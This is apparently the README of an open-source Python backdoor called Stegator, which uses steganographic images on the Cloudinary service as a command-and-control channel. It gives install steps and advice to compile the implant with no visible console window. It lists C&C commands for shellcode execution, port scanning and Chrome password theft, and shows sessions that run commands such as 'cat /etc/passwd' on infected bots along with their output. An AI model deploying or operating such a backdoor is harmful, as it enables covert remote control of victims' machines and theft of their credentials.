A Python based backdoor that uses a Cloud Image Service (Cloudinary) as a command and control server. Use by your own risk!
Using Steganography all the commands are "inserted" in ramdom images downloaded from imgur and uploaded to a Cloud service in this PoC Cloudinary.
This project has been inspired by Gcat and Twittor which does the same but using a Cloud Image Service in this Proof of concept Cloudinary but can be used in any other like Instagram, Flickr or Imgur using their API services.
Only are needed the dependencies mentioned below.
- 2.7 < Python < 3.0
- python cloudinary module
- Steghide steghide
# apt-get install python python-pip python-dev build-essential libsqlite3-dev
# apt-get install steghide
# git clone https://github.com/1modm/stegator.git && cd stegator
# pip install -r requirements.lst
- Install python 2.X https://www.python.org/downloads/windows/
- Download https://github.com/1modm/stegator/archive/master.zip
- Install required modules
- Download Steghide [steghide](http://steghide.sourceforge.net/)
Also you need:
- A Cloudinary account (Use a dedicated account! Do not use your personal one!)
- Search and use the next account details: (Cloud name, API Key, API Secret)
This repository contains two files:
stegator.pyC&Cimplant.pyBackdoor
In both files, edit the access token part and add the ones that you previously generated:
cloudinary.config(
cloud_name = "xxxxxxxxxxxx",
api_key = "xxxxxxxxxxxx",
api_secret = "xxxxxxxxxxxx"
)You're probably going to want to compile implant.py into an executable using Pyinstaller
In order to remove the console when compiling with Pyinstaller, the flags --noconsole --onefile will help. Just saying.
In order to run the C&C:
$ python stegator.py
You'll then get into an 'interactive' shell which offers few commands that are:
C&C console > help
cleanup - Clean Cloud Service images
refresh - Refresh C&C control and ping all bots
bots - List active bots
commands - List executed commands
retrieve <jobid> - Retrieve jobid command
cmd <MAC ADDRESS> command - Execute the command on the bot
shellcode <MAC ADDRESS> shellcode - Load and execute shellcode in memory (Windows only)
scanner <MAC ADDRESS> <IP>:<PORT> - Port scanner example: scanner 0:0:0:0 192.168.1.1:22,80,443
chromepasswords <MAC ADDRESS> - Retrieve Chrome Passwords from bot (Windows only)
help - Print this usage
exit - Exit the client
C&C console >
- Once you've deployed the backdoor on a couple of systems, you can check available clients using the bots command:
C&C console > bots
Bot: 04:D6:27:72:A3:E9 Windows-7-6.1.7601-SP1
Bot: 68:A3:C4:F0:98:CE Linux-4.4.0-23-generic-x86_64-with-Ubuntu-16.04-xenial
Bot: 04:00:72:3F:D6:98 Linux-3.16.0-4-amd64-x86_64-with-debian-8.2
C&C console >
The output is the MAC address which is used to uniquely identifies the system but also gives you OS information the implant is running on.
- Let's issue a command to an implant:
C&C console > cmd 04:D6:27:72:A3:E9 ipconfig
[+] Downloading image from Cloud Service...
[+] Uploaded image to Cloud Service
[+] Steganography applied, image saved
[+] Sent command ipconfig with jobid: 97ee81e0647a4f248ac47c68e8b25b88
C&C console >
- Lets get the results!
C&C console > retrieve 97ee81e0647a4f248ac47c68e8b25b88
97ee81e0647a4f248ac47c68e8b25b88:
Configuracin IP de Windows
Adaptador de Ethernet Conexin de rea local:
Sufijo DNS especfico para la conexin. . : Home
Vnculo: direccin IPv6 local. . . : fe30::2c37:4432:4551:c71a%11
Direccin IPv4. . . . . . . . . . . . . . : 192.168.66.25
Mscara de subred . . . . . . . . . . . . : 255.255.255.0
Puerta de enlace predeterminada . . . . . : 192.168.66.1
Adaptador de tnel isatap.Home:
Estado de los medios. . . . . . . . . . . : medios desconectados
Sufijo DNS especfico para la conexin. . : Home
Adaptador de tnel Conexin de rea local*:
Estado de los medios. . . . . . . . . . . : medios desconectados
Sufijo DNS especfico para la conexin. . :
C&C console >
C&C console > cmd 04:00:72:3F:D6:98 cat /etc/passwd
[+] Downloading image from Cloud Service...
[+] Uploaded image to Cloud Service
[+] Steganography applied, image saved
[+] Sent command cat /etc/passwd with jobid: 631f4ee7328244b8b462876e1f8dd753
C&C console >
- Lets get the results!
C&C console > retrieve 631f4ee7328244b8b462876e1f8dd753
631f4ee7328244b8b462876e1f8dd753:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
avahi-autoipd:x:107:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:116:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:110:117::/var/spool/postfix:/bin/false
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
haproxy:x:113:121::/var/lib/haproxy:/bin/false
proftpd:x:114:65534::/run/proftpd:/bin/false
ftp:x:115:65534::/srv/ftp:/bin/false
- Refresh results
In order to retrieve new bots/command outputs but also force the client to refresh the results, use the refresh command.
C&C console > refresh
[+] Sending command to retrieve alive bots
[+] Downloading image from Cloud Service...
[+] Uploaded image to Cloud Service
[+] Steganography applied, image saved
[+] Sleeping 10 secs to wait for bots
This will send a PING request and wait 10 seconds for them to answer.
- Retrieve previous commands
C&C console > commands
631f4ee7328244b8b462876e1f8dd753: 'cat /etc/passwd' on 04:00:72:3F:D6:98
97ee81e0647a4f248ac47c68e8b25b88: 'ipconfig' on 04:D6:27:72:A3:E9
C&C console >
Write some self written code to avoid external libraries (steghide) and use some code like http://blog.brian.jp/python/png/2016/07/07/file-fun-with-pyhon.html
Project is entirely open source and released under MIT license.
Fork the project, contribute, submit pull requests, and have fun.
If you find a bug, open an issue on Github and/or ping me on Twitter.
Thanks and feel free to check the Twittor and Gcat projects from PaulWebSec and byt3bl33d3r from which I forked the project.
